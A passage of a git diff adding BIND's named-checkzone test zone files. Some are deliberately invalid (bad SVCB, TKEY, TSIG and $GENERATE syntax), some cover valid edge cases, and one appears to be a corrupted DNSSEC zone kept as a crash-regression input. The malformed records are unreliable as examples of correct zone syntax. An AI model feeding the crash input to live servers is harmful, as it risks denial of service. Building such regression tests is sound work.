aabbccdd ( CPNMU MX DNSKEY NS + SOA NSEC3PARAM RRSIG ) diff --git a/bin/tests/system/checkzone/zones/bad-svcb-mandatory.db b/bin/tests/system/checkzone/zones/bad-svcb-mandatory.db new file mode 100644 index 0000000..368f0ca --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-svcb-mandatory.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +svcb SVCB 0 . mandatory=alpn diff --git a/bin/tests/system/checkzone/zones/bad-svcb-servername.db b/bin/tests/system/checkzone/zones/bad-svcb-servername.db new file mode 100644 index 0000000..61751a0 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-svcb-servername.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +svcb SVCB 1 _underscore.example. port=60 alpn=h3 ech="ZWFzdGVyIGVnZyE=" diff --git a/bin/tests/system/checkzone/zones/bad-svcb.db b/bin/tests/system/checkzone/zones/bad-svcb.db new file mode 100644 index 0000000..ad710bf --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-svcb.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +svcb SVCB 0 . unknown=wha diff --git a/bin/tests/system/checkzone/zones/bad-tkey.db b/bin/tests/system/checkzone/zones/bad-tkey.db new file mode 100644 index 0000000..a030074 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-tkey.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +tkey TKEY invalid.algorithm. 1516055980 1516140801 1 0 16 gRof8D2BFKvl/vrr9Lmnjw== 16 gRof8D2BFKvl/vrr9Lmnjw== diff --git a/bin/tests/system/checkzone/zones/bad-tsig.db.in b/bin/tests/system/checkzone/zones/bad-tsig.db.in new file mode 100644 index 0000000..daef06c --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-tsig.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +tsig TSIG @DEFAULT_HMAC@ 1516135665 300 20 thBt8DheAD7qpqSFTiGK999sxGg= 54994 NOERROR 0 diff --git a/bin/tests/system/checkzone/zones/bad-unspec.db b/bin/tests/system/checkzone/zones/bad-unspec.db new file mode 100644 index 0000000..e5abefe --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad-unspec.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 +example IN TYPE103 ^# 1 00 diff --git a/bin/tests/system/checkzone/zones/bad1.db b/bin/tests/system/checkzone/zones/bad1.db Binary files differnew file mode 100644 index 0000000..05ab829 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad1.db diff --git a/bin/tests/system/checkzone/zones/bad2.db b/bin/tests/system/checkzone/zones/bad2.db new file mode 100644 index 0000000..38e82e6 --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad2.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; The following GENERATE directive contains two dashes in the range +; which is a syntax error. +$GENERATE 9--10 host$ 3600 A 192.0.2.$ diff --git a/bin/tests/system/checkzone/zones/bad3.db b/bin/tests/system/checkzone/zones/bad3.db new file mode 100644 index 0000000..1391afe --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad3.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 +; +; A trailing '/' is not permitted. +; +$GENERATE 1-3/ $ A 1.2.3.$ diff --git a/bin/tests/system/checkzone/zones/bad4.db b/bin/tests/system/checkzone/zones/bad4.db new file mode 100644 index 0000000..99def7a --- /dev/null +++ b/bin/tests/system/checkzone/zones/bad4.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 +; +; A step of zero is not permitted. +; +$GENERATE 1-3/0 $ A 1.2.3.$ diff --git a/bin/tests/system/checkzone/zones/badttl.db b/bin/tests/system/checkzone/zones/badttl.db new file mode 100644 index 0000000..95cd422 --- /dev/null +++ b/bin/tests/system/checkzone/zones/badttl.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +ns-and-dname NS ns.ns-and-dname + DNAME example.com. +ns.ns-and-dname A 203.178.141.207 diff --git a/bin/tests/system/checkzone/zones/crashzone.db b/bin/tests/system/checkzone/zones/crashzone.db new file mode 100644 index 0000000..2a62e2a --- /dev/null +++ b/bin/tests/system/checkzone/zones/crashzone.db @@ -0,0 +1,62 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +dyn.example.net. 7200 IN SOA ns1.example.net. hostmaster.example.net. ( + 6 ; serial + 43200 ; refresh (12 hours) + 1800 ; retry (30 minutes) + 1209600 ; expire (2 weeks) + 7200 ; minimum (2 hours) + ) + 7200 RRSIG SOA 7 3 7200 2010 20100225214229 30323 dyn.example.net. MuyI + 7200 NS ns1.example.net. + 7200 NS ns2.example.net. + 3600 RRSIG DNSKEY 7 3 3600 20100227180048 ( + 20100221180048 52935 dyn.example.net. + MuyIUCa3XlttWuSnaQegQnRgTrTsx0Mj4EGI + fwtZs2H3L079Y/brqMvtlIGxtlr9meLg43oo + jX1w48ilerzf1PwYhtVpFefZTgmClK0h2ej4 + Ho9Qh4/6snesVj06kWsQDkhuVs58zHmhRtEy + P4YlqP/R1CAk166RhwSmGuSx1O8= ) + 0 NSEC3PARAM 1 0 10 76931F +ns1.dyn.example.net. 7200 IN A 1.0.0.5 + 7200 AAAA 2001:db8::53 + 7200 RRSIG AAAA 7 4 7200 20100227180048 ( + 20100221180048 30323 dyn.example.net. + dk1DfG0y9qjCi3VD4e9B1NGKWEig7q8hFdaR + 3hElCIzGlflvgHRiE7iTJxDMB+kTA0by4BMZ + yssUuXP2FMlB2g== ) +ns2.dyn.example.net. 7200 IN A 1.2.0.6 +y.dyn.example.net. 7200 IN A 1.2.3.5 +z.dyn.example.net. 7200 IN A 1.2.3.6 +A54T6DKFVU4QCKFFNJ0KEU0FH0I4OJSN.dyn.example.net. 7200 IN NSEC3 1 0 10 76931F AJHVGTICN6K0VDA53GCHFMT219SRRQLM A RRSIG +ò 7200 RRSIG NSEC3 7 4 7200 00100227180048 ( + 20100221180048 30323 dyn.example.net. + 9BhZcQdLwRPU/Dz38uMis/nCcddyhKEm0Zb+ + Mhh3V3OsGI202cebTaxbwVEbQQOeowpUmf8l + AmK/cNX7+IS2rw== ) +AJHVGTICN6K0VDA53GCHFMT219SRRQLM.dyn.example.net. 7200 IN NSEC3 1 0 10 76931F FQ7RBG86KRMACA1NAAKP2KQRQALBA0C7 A RRSIG +FQ7RBG86KRMACA1NAAKP2KQRQALBA0C7.dyn.example.net. 7200 RRSIG NSEC3 7 4 7200 20100227180048 ( + 20100221180048 30323 dyn.example.net. + 577WZnTQemStx+diON9rEGXAGnU7C0KLjrFL + VyhocnBnNtxJS8eRMSWvb9XuYCMNhYKOurtt + Ar4qh4VW1+unmA== ) +I7A7A184GGMI35K1E3IR650LKO7NOB5R.dyn.example.net. 7200 IN NSEC3 1 0 10 76931F IMQ912BREQP1POLAH3RMONG;UED541AS A RRSIG +IMQ912BREQP1POLAH3RMONG3UED541AS.dyn.example.net. 7200 IN NSEC3 1 0 10 76931F S3USV4M1HLVJ8F88EDSG8N9PVQRQ20N7 A RRSIG + 7200 RRSIG NSEC3 7 4 7200 20100227180048 ( + 20100221180048 30323 dyn.example.net. + smsg35snQ9PpeG2r8ZGxBl44pwSReh/1rIil + u/n8aa5nKbBpkqtbcc7q1OpUgb1Q7+Tl/wes + kB6bJA== ) +S3USV4M1HLVJ8F88EDSG8N9PVQRQ20N7.dyn.example.net. 7200 RRSIG NSEC3 7 4 7200 20100227180048 ( + 20100221180048 30323 dyn.example.net. + XalRIESpdeVK1aNbwu9ym2SpK981Y127rKua + xsoals0Zn2tTjF9wpOYVGVOto3FcWBbyKD1g + 69BTRlv634UIOw== ) +T320G5LC07QE1BLR074KORIJTG9DPTI9.dyn.example.net. 7200 IN NSEC3 1 0 10 76931F A54T6DKFVU4QCAFFNJ0KEU0FH0I4OJSN NS SOA RRSIG DNSKEY NSEC3PARAM diff --git a/bin/tests/system/checkzone/zones/delegating-ns-address-below-dname.db b/bin/tests/system/checkzone/zones/delegating-ns-address-below-dname.db new file mode 100644 index 0000000..78c1029 --- /dev/null +++ b/bin/tests/system/checkzone/zones/delegating-ns-address-below-dname.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +example.com. SOA marka.isc.org. a.root.servers.nil. ( + 2026 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +example.com. NS ns.example.com. +ns.example.com. A 192.168.0.2 +sub.example.com. NS ns.sub2.example.com. +sub2.example.com. DNAME example.net. +ns.sub2.example.com. A 192.168.0.2 diff --git a/bin/tests/system/checkzone/zones/generate-overflow.db b/bin/tests/system/checkzone/zones/generate-overflow.db new file mode 100644 index 0000000..c16b517 --- /dev/null +++ b/bin/tests/system/checkzone/zones/generate-overflow.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +$GENERATE 19-28/2147483645 $ CNAME x diff --git a/bin/tests/system/checkzone/zones/good-cdnskey.db b/bin/tests/system/checkzone/zones/good-cdnskey.db new file mode 100644 index 0000000..7892f13 --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-cdnskey.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 0 SOA . . 0 0 0 0 0 +example. 0 NS . +example. 0 DNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= +example. 0 CDNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= diff --git a/bin/tests/system/checkzone/zones/good-cds-unsigned.db b/bin/tests/system/checkzone/zones/good-cds-unsigned.db new file mode 100644 index 0000000..9b1737d --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-cds-unsigned.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 0 SOA . . 0 0 0 0 0 +example. 0 NS . +example. 0 CDS 0 0 0 00 +example. 0 CDNSKEY 0 3 0 AA== + diff --git a/bin/tests/system/checkzone/zones/good-cds.db b/bin/tests/system/checkzone/zones/good-cds.db new file mode 100644 index 0000000..9200657 --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-cds.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 0 SOA . . 0 0 0 0 0 +example. 0 NS . +example. 0 DNSKEY 257 3 10 AwEAAbqjg7xdvnU2Q/gtLw5LOfr5cDeTRjYuEbkzGrUiVSOSoxcTxuao WS/AFPQHuD8OSLiE/CeZ087JowREXl058rRfae8KMrveY17V0wmKs9N1 F1wf/hRDpXiThlRHWlskp8eSEEIqYrrHgWTesy/xDGIEOFM1gwRo0w8j KdRRJeL2hseTMa+m3rTzrYudUsI0BHLW8PiDUCbG5xgdee8/5YR4847i AAqHIiPJ1Z/IT53OIjMmtv5BUykZ8RYjlJxxX+C+dpRKiK73SQaR3hCB XAYOL9WsDp2/fpmEZpewavkMkdC+j2CX+z27MCS3ASO0AeKK0lcNXwND kgreE+Kr7gc= +example. 0 CDS 14364 10 2 FD03B2312C8F0FE72C1751EFA1007D743C94EC91594FF0047C23C37CE119BA0C diff --git a/bin/tests/system/checkzone/zones/good-dns-sd-reverse.db b/bin/tests/system/checkzone/zones/good-dns-sd-reverse.db new file mode 100644 index 0000000..fffd27b --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-dns-sd-reverse.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 60 +@ IN SOA . . 0 0 0 0 0 +@ IN NS . +; +; The following are Service Discovery Prefixes from RFC 6763 and the +; PTR check-names rules for IN-ADDR.ARPA and IP6.ARPA do not apply. +; +b._dns-sd._udp IN PTR !@#3. +db._dns-sd._udp IN PTR !@#3. +r._dns-sd._udp IN PTR !@#3. +dr._dns-sd._udp IN PTR !@#3. +lb._dns-sd._udp IN PTR !@#3. diff --git a/bin/tests/system/checkzone/zones/good-gc-msdcs.db b/bin/tests/system/checkzone/zones/good-gc-msdcs.db new file mode 100644 index 0000000..defd550 --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-gc-msdcs.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 +gc._msdcs A 192.0.2.2 diff --git a/bin/tests/system/checkzone/zones/good-generate-modifier.db b/bin/tests/system/checkzone/zones/good-generate-modifier.db new file mode 100644 index 0000000..3c811d6 --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-generate-modifier.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +$GENERATE 0-7 host$ A 1.2.3.${1,0,d} +$GENERATE 8-9 host$ A 1.2.3.${1,0} +$GENERATE 10-11 host$ A 1.2.3.${1} +$GENERATE 1024-1026 ${0,3,n} AAAA 2001:db8::${0,4,x} diff --git a/bin/tests/system/checkzone/zones/good-nsap.db b/bin/tests/system/checkzone/zones/good-nsap.db new file mode 100644 index 0000000..8ad9ee0 --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-nsap.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; empty NSAP address +example NSAP 0x47.0005.80.005a00.0000....0001.e133.ffffff000162.00 diff --git a/bin/tests/system/checkzone/zones/good-nsec3-nopadhash.db b/bin/tests/system/checkzone/zones/good-nsec3-nopadhash.db new file mode 100644 index 0000000..5bd378c --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-nsec3-nopadhash.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +; a hash that isn't a multiple of 8 characters +CPNMU NSEC3 2 1 12 aabbccdd ( CPNMU MX DNSKEY NS + SOA NSEC3PARAM RRSIG ) diff --git a/bin/tests/system/checkzone/zones/good-occulted-ns-by-dname.db b/bin/tests/system/checkzone/zones/good-occulted-ns-by-dname.db new file mode 100644 index 0000000..80fc4a6 --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-occulted-ns-by-dname.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +example. SOA marka.isc.org. a.root.servers.nil. ( + 2026 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +example. DNAME example.net. ; only the apex record exist +example. NS ns.example.net. ; out of zone +foo.example. NS exavider.example. ; no "address" records diff --git a/bin/tests/system/checkzone/zones/good-occulted-ns-by-ns.db b/bin/tests/system/checkzone/zones/good-occulted-ns-by-ns.db new file mode 100644 index 0000000..38913b9 --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-occulted-ns-by-ns.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +example. SOA marka.isc.org. a.root.servers.nil. ( + 2026 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +example. NS ns.example.net. ; out of zone +foo.example. NS ns.example.net. ; out of zone +bar.foo.example. NS x.foo.example. ; no address records diff --git a/bin/tests/system/checkzone/zones/good-spf-exception.db b/bin/tests/system/checkzone/zones/good-spf-exception.db new file mode 100644 index 0000000..212bfbc --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-spf-exception.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 +a._spf A 192.0.2.2 +a._spf_rate A 192.0.2.2 +a._spf_verify A 192.0.2.2 diff --git a/bin/tests/system/checkzone/zones/good-svcb.db b/bin/tests/system/checkzone/zones/good-svcb.db new file mode 100644 index 0000000..df868f3 --- /dev/null +++ b/bin/tests/system/checkzone/zones/good-svcb.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +svcb0 SVCB 0 example.net. +svcb1 SVCB 1 . port=60 alpn=h3 ech="ZWFzdGVyIGVnZyE=" +svcb2 SVCB 2 . no-default-alpn alpn=alpn +svcb3 SVCB 3 . ipv4hint="10.10.10.10" +svcb4 SVCB 4 . ipv6hint="feed:a::bee" +svcb5 SVCB 5 . key9999="something" +svcb6 SVCB 6 . mandatory=port,alpn port=60 alpn=h3 +svcb7 SVCB 7 . mandatory=port,alpn port=60 alpn=h1,h3 +svcb8 SVCB 8 . mandatory=port,alpn port=60 alpn="h1\\,h2,h3" +svcb9 SVCB 0 44._svbc.example.net. +svcb10 SVCB 7 . alpn="h2,h3" dohpath=/{?dns} diff --git a/bin/tests/system/checkzone/zones/good1.db b/bin/tests/system/checkzone/zones/good1.db new file mode 100644 index 0000000..59eaa54 --- /dev/null +++ b/bin/tests/system/checkzone/zones/good1.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2011012708 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +ns-and-dname NS ns.ns-and-dname + DNAME example.com. +ns.ns-and-dname A 203.178.141.207 diff --git a/bin/tests/system/checkzone/zones/inherit.db b/bin/tests/system/checkzone/zones/inherit.db new file mode 100644 index 0000000..e075d41 --- /dev/null +++ b/bin/tests/system/checkzone/zones/inherit.db @@ -0,0 +1,12 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + + NS . diff --git a/bin/tests/system/checkzone/zones/nowarn.inherited.owner.db b/bin/tests/system/checkzone/zones/nowarn.inherited.owner.db new file mode 100644 index 0000000..db26217 --- /dev/null +++ b/bin/tests/system/checkzone/zones/nowarn.inherited.owner.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 IN SOA . . 0 0 0 0 0 +$INCLUDE "zones/inherit.db" diff --git a/bin/tests/system/checkzone/zones/ns-address-below-dname.db b/bin/tests/system/checkzone/zones/ns-address-below-dname.db new file mode 100644 index 0000000..e15ad5c --- /dev/null +++ b/bin/tests/system/checkzone/zones/ns-address-below-dname.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +example.com. SOA 